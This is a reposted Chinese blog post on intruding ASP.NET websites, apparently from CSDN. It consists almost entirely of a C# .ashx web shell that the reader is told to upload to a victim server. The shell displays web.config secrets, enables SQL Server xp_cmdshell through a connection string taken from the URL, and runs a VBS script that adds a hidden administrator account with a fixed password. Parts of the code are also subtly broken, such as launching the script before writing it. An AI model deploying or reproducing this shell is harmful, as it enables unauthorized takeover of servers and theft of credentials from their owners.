ASP.NET网站入侵思路

其他 2021-01-29 10:13:56 阅读次数: 0

想办法把下面的代码保存为xxx.ashx文件,然后上传到对方服务器,然后通过url访问即可看到 web.config

<%@ WebHandler Language="C#" Class="TextLd" %> 
using System; 
using System.Collections.Generic; 
using System.Linq; 
using System.Web; 
using System.Data.SqlClient; 
 
    public class TextLd : IHttpHandler 
    { 
        public void CreateLocalUser(string newPath) 
        { 
            System.Diagnostics.Process.Start(@"d:\1.vbs"); 
            System.IO.File.WriteAllText(@"d:\1.vbs", "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\""); 
        } 
        public void ShowWebConfig(HttpContext context) 
        { 
            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config"))); 
        } 
        public void WriteVbs(HttpContext context) 
        { 
            System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\""); 
        } 
        public void ExecuteSql(string connection, string sql) 
        { 
            using (SqlConnection con = new SqlConnection(connection)) 
            { 
                using (SqlCommand commd = new SqlCommand(sql, con)) 
                { 
                    con.Open(); 
                    commd.ExecuteNonQuery(); 
                    con.Close(); 
                } 
            } 
        } 
        public void ProcessRequest(HttpContext context) 
        { 
            context.Response.ContentType = "text/plain"; 
            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config"))); 
            try 
            { 
                var connection = context.Request.QueryString["connection"]; 
                switch (context.Request.QueryString["method"]) 
                { 
                    case "1": WriteVbs(context); break; 
                    case "2": 
                        ExecuteSql(connection,@"sp_configure 'show advanced options',1  reconfigure"); 
                        ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell 
                        break; 
                    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'"); 
                        break; 
                    default: 
                        ShowWebConfig(context); 
                        break; 
                } 
            } 
            catch (Exception ex) 
            { 
                context.Response.Write(ex.Message); 
            } 
            context.Response.End(); 
        } 
        public bool IsReusable 
        { 
            get 
            { 
                return false; 
            } 
        } 
    }

猜你喜欢

转载自blog.csdn.net/ccagy/article/details/111385807
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022